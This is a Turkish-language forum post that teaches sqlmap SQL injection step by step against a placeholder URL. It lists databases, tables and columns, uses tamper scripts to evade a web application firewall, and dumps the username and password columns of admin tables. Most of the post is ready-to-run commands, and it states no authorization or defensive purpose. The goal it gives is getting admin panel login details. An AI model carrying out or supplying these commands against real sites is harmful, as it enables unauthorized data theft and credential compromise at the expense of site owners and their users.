sql çektiğimizde ara ara çeşitli problemler oluşabiliyor. Onun için bu konuya göz atmakta fayda vardır, Öncelikle db deb
üzerinden başlayacağız. Bunun için "--dbs" komutu kullanılır.
Bir örnek gösterecek olursak;
root@kali:# sqlmap -u siteadı.com/index.php?id=5 --dbs
Burda "-u" ile urlyi tanıttık ve "--dbs" ile de databaseyi çekmeye başladık.
Bu şekilde tararken o da ne bir hata smile.gif) Sakin olun korkmayın hemen hataya bakın.[CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request gibi bir hataysa hemen şu komutu yazıyoruz tekrardan.
root@kali:# sqlmap -u siteadı.com/index.php?id=5 --user-agent --dbs
İlerledik ilerledik. Baktık bidaha hata geldi. Hain WAF. Bu hata için ise "--tamper" komutunu kullaranarak atlatıcaz wafı.
root@kali:# sqlmap -u siteadı.com/index.php?id=5 --user-agent --tamper=greatest --dbs
Ben burda "greatest" adlı tamperi kullandım siz diğer tamperlere ulaşmak için ;
root@kali:# cd /usr/share/sqlmap/tamper
Klasörüne geçiş yaptık ve "ls -l" komutu ile tamperleri görürüz. Tamperi yazarken .py gibi şeyler yazmayın sadece adını yazın.
Devam ediyoruz database adları çıktı. Bundan sonrası basit zaten. Önceklikle database adlarına bakalım bi. "İnformation ...." gibi bi database adı varsa onu almayacagız o boştur boş smile.gif))
Herhangi bi databaseyi aldık. Sonrasında şöyle devam ediyoruz.
root@kali:# sqlmap -u siteadı.com/index.php?id=5 -D [seçtiğimiz database adı] --tables
Daha sonra tabloları çektik. Tablolardan bakıyoruz. User,admin kısacası admin paneli giriş için gerekli olan bilgileri barındıran tabloyu seçip şu komutu yazıyoruz.
root@kali:# sqlmap -u siteadı.com/index.php?id=5 -D [Database adı] -T [Tablo adı] --columns
Şimdi gene bir tablo çıktı ekrana. Bakıyoruz id,pass,password,username gibi isimler var. Şimdi en son yere geldik. Hadi yazalım komutu
root@kali:# sqlmap -u siteadı.com/index.php?id=5 -D [Database adı] -T [Tablo adı] -C [Seçtiğimiz admin,user,password gibi yerlerin adı] --dump
Ve şimdi işimiz bitti kolay gelsin.
Harika post
@originalworks